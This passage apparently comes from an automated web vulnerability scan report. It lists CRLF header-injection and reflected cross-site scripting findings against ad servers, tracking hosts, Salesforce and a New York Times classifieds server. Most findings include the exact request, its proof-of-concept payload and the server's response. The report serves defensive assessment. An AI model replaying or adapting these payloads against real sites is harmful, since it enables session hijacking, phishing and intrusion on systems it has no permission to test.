GET /91a3b%0d%0a8a3d72eaf29/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/91a3b
8a3d72eaf29
/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http: //www.nytimes.com/adx/bin/adx_click.html
Date: Mon, 15 Nov 2010 07:20:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7d98a%0d%0a59d7a244a36 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7d98a%0d%0a59d7a244a36/N4300.NYTimes/B5008440.7 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7d98a
59d7a244a36
/N4300.NYTimes/B5008440.7:
Date: Mon, 15 Nov 2010 11:44:07 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.5. http://ad.vulnerable.ad.partner/adj/N5047.nytimes.com/B4921701.5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5047.nytimes.com/B4921701.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 72682%0d%0a5799f80cf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /72682%0d%0a5799f80cf0/N5047.nytimes.com/B4921701.5;sz=300x250;pc=nyt147899_246776;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=University_of_Phoenix_1533295_01-nyt3&ad=uofp-300x250-B4921701.5&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802074&sn1=5534326f/3bfe39b9&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/72682
5799f80cf0
/N5047.nytimes.com/B4921701.5;sz=300x250;pc=nyt147899_246776;ord=2010.11.15.07.15.33;click=http: //www.nytimes.com/adx/bin/adx_click.html
Date: Mon, 15 Nov 2010 07:22:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.6. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36239%0d%0ad7834691ffb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36239%0d%0ad7834691ffb/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/36239
d7834691ffb
/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http: //www.nytimes.com/adx/bin/adx_click.html
Date: Mon, 15 Nov 2010 07:20:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.7. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 89338%0d%0ae8e383c05b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /89338%0d%0ae8e383c05b0/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/89338
e8e383c05b0
/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http: //www.nytimes.com/adx/bin/adx_click.html
Date: Mon, 15 Nov 2010 07:22:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.8. http://na.link.decdna.net/n/80094/80572/www.sap.com/1043fg1 [11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/80094/80572/www.sap.com/1043fg1

Issue detail

The value of the 11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq request parameter is copied into the location response header. The payload b8461%0d%0adb4a5794385 was submitted in the 11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq parameter. This caused a response containing an injected HTTP header.

Request

GET /n/80094/80572/www.sap.com/1043fg1;11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq=b8461%0d%0adb4a5794385&247cr=6349709945/x22 HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:41:26 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Mon, 15 Nov 2010 09:41:26 GMT
location: http://www.sap.comb8461
db4a5794385

Set-Cookie: %2edecdna%2enet/%2fn%2f80094/2/e=1289814086/80094/80572/1/0//8///769481856/0/0/109278422///0/1289814086/ct%2c/0/http%3a%2f%2fwww%2esap%2ecomb8461%0d%0adb4a5794385/26481749/0; expires=Wed, 15-Dec-2010 09:41:26 GMT; path=/n/80094; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9304437677715620207; expires=Tue, 15-Nov-2011 09:41:26 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9304437677698843084; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

3.9. http://na.link.decdna.net/n/80094/80572/www.sap.com/1043fg1 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/80094/80572/www.sap.com/1043fg1

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload f7f81%0d%0a4d471187b11 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/80094/80572/f7f81%0d%0a4d471187b11/1043fg1;11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq=%2fmk%2fget%2fSEA13%3fSOURCEID%3d41%26campaigncode%3dCRM%2dXJ10%2dUSM%2dSEARCH18%26source%3dmsgsdkwus01%26tnt%3dcloud%26kw%3dcloud%2bcomputing%26dna%3d%3cx%3dthirdPartyTracking%28%27%2c%27%2c1%2c255%29%3e&247cr=6349709945/x22 HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:41:27 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Mon, 15 Nov 2010 09:41:27 GMT
location: http://f7f81
4d471187b11
/mk/get/SEA13?SOURCEID=41&campaigncode=CRM-XJ10-USM-SEARCH18&source=msgsdkwus01&tnt=cloud&kw=cloud+computing&dna=<x=thirdPartyTracking(',',1,255)>
Set-Cookie: %2edecdna%2enet/%2fn%2f80094/2/e=1289814087/80094/80572/1/0//8///769481856/0/0/109278422///0/1289814087/ct%2c/0/http%3a%2f%2ff7f81%0d%0a4d471187b11%2fmk%2fget%2fSEA13%3fSOURCEID%3d41%26campaigncode%3dCRM%2dXJ10%2dUSM%2dSEARCH18%26source%3dmsgsdkwus01%26tnt%3dcloud%26kw%3dcloud%252bcomputing%26dna%3d80572%252c8%252c0%252c109278422%252c769481856%252c1289814087%252c%252c26481749%252c0/26481749/0; expires=Wed, 15-Dec-2010 09:41:27 GMT; path=/n/80094; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9322452076560646501; expires=Tue, 15-Nov-2011 09:41:27 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9322452076560646613; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


3.10. http://pixel2233.everesttech.net/2233/rq/3/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel2233.everesttech.net
Path:   /2233/rq/3/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22

Issue detail

The value of REST URL parameter 3 is copied into the Set-Cookie response header. The payload 72cdf%0d%0a2b3a821784 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /2233/rq/72cdf%0d%0a2b3a821784/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 HTTP/1.1
Host: pixel2233.everesttech.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:43:05 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k
Set-Cookie: everest_session_v2=NM1M4QCpAAAANmo; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~NM1M4QCpAAAANmo; path=/; domain=.everesttech.net; expires=Mon, 19-Nov-2029 20:23:05 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache, max-age=0
Set-Cookie: everest_cookie=ev_surferid~NM1M4QCpAAAANmo~ev_uid~2233~ev_sid~72cdf
2b3a821784
~ev_clientid~s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online storage~ev_clickid~NM1M4QCpAAAANmo~ev_clicktime~20101115094305; path=/; domain=pixel2233.everesttech.net; expires=Mon, 19-Nov-2029 20:23:05 GMT
Location: http://shop.trendmicro.com/safesync/sem/buy/10/?cm_mmc=Value_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22&ef_id=NM1M4QCpAAAANmo:20101115094305:s
Expires: Mon, 15 Nov 2010 09:43:05 GMT
Content-Length: 472
Keep-Alive: timeout=15, max=672
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://shop.trendmicro.com/safesync/sem/buy/10/
...[SNIP]...

3.11. http://pixel2233.everesttech.net/2233/rq/3/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel2233.everesttech.net
Path:   /2233/rq/3/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22

Issue detail

The value of REST URL parameter 4 is copied into the Set-Cookie response header. The payload c925c%0d%0aeac5f79dbde was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /2233/rq/3/c925c%0d%0aeac5f79dbde/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 HTTP/1.1
Host: pixel2233.everesttech.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:43:06 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k
Set-Cookie: everest_session_v2=MyRM4QCqAQAAIkQ; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~MyRM4QCqAQAAIkQ; path=/; domain=.everesttech.net; expires=Mon, 19-Nov-2029 20:23:06 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache, max-age=0
Set-Cookie: everest_cookie=ev_surferid~MyRM4QCqAQAAIkQ~ev_uid~2233~ev_sid~3~ev_clientid~c925c
eac5f79dbde
~ev_clickid~MyRM4QCqAQAAIkQ~ev_clicktime~20101115094306; path=/; domain=pixel2233.everesttech.net; expires=Mon, 19-Nov-2029 20:23:06 GMT
Location: http://shop.trendmicro.com/safesync/sem/buy/10/?cm_mmc=Value_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22&ef_id=MyRM4QCqAQAAIkQ:20101115094306:s
Expires: Mon, 15 Nov 2010 09:43:06 GMT
Content-Length: 472
Keep-Alive: timeout=15, max=973
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://shop.trendmicro.com/safesync/sem/buy/10/
...[SNIP]...

3.12. http://www.salesforce.com/cloudcomputing/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /cloudcomputing/x22

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d985f%0d%0a0cf54ea3fe2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d985f%0d%0a0cf54ea3fe2/x22 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /d985f
0cf54ea3fe2
/x22/
Date: Mon, 15 Nov 2010 10:48:03 GMT
Connection: close
Content-Length: 85

The URL has moved to <a href="/d985f
0cf54ea3fe2/x22/">/d985f
0cf54ea3fe2/x22/</a>

3.13. http://www.salesforce.com/cloudcomputing/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /cloudcomputing/x22

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 6b2a5%0d%0abc8e8fdeedd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /cloudcomputing/6b2a5%0d%0abc8e8fdeedd HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /cloudcomputing/6b2a5
bc8e8fdeedd
/
Date: Mon, 15 Nov 2010 10:48:04 GMT
Connection: close
Content-Length: 107

The URL has moved to <a href="/cloudcomputing/6b2a5
bc8e8fdeedd/">/cloudcomputing/6b2a5
bc8e8fdeedd/</a>

3.14. https://www.salesforce.com/form/signup/freeforce-platform-sem.jsp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /form/signup/freeforce-platform-sem.jsp

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 36d77%0d%0ac41153cb8fb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /form/signup/36d77%0d%0ac41153cb8fb HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /form/signup/36d77
c41153cb8fb
/
Date: Mon, 15 Nov 2010 10:48:08 GMT
Connection: close
Content-Length: 101

The URL has moved to <a href="/form/signup/36d77
c41153cb8fb/">/form/signup/36d77
c41153cb8fb/</a>

4. Cross-site scripting (reflected)
There are 617 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://209.11.106.150/NYTULS_FSBOStaging/default.asp [CategoryID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://209.11.106.150
Path:   /NYTULS_FSBOStaging/default.asp

Issue detail

The value of the CategoryID request parameter is copied into a JavaScript rest-of-line comment. The payload 80331%0aalert(1)//da7467547cd was submitted in the CategoryID parameter. This input was echoed as 80331
alert(1)//da7467547cd
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYTULS_FSBOStaging/default.asp?CategoryID=BIZDIR80331%0aalert(1)//da7467547cd HTTP/1.1
Host: 209.11.106.150
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 11:19:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 25743
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAAQTADCQ=BMIBILIAJOFCDJHKDMMIHHEA; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>The New York Times: Classified Marketplace Place an Ad</TITLE>
<meta name="keywords" content="Classified Marketp
...[SNIP]...
<SCRIPT TYPE="text/javascript">
//-------------------------------------------------------------------------
function Check_Step1()
{
   var chk = "N"
   //if ('BIZDIR80331
alert(1)//da7467547cd
' != 'BOSWTS')
   //{
       //document.ListingType.LTypeId.checked = true;
       //return true
   //}    

   for (i = 0; i < document.ListingType.LTypeId.length; i ++) {
       if (document.ListingType.LTypeId[i].ch
...[SNIP]...

4.2. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e821b"-alert(1)-"5f7083f8c15 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpte821b"-alert(1)-"5f7083f8c15&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpte821b"-alert(1)-"5f7083f8c15&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "op
...[SNIP]...

4.3. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f98f2'-alert(1)-'bb5252f170b was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmptf98f2'-alert(1)-'bb5252f170b&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmptf98f2'-alert(1)-'bb5252f170b&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

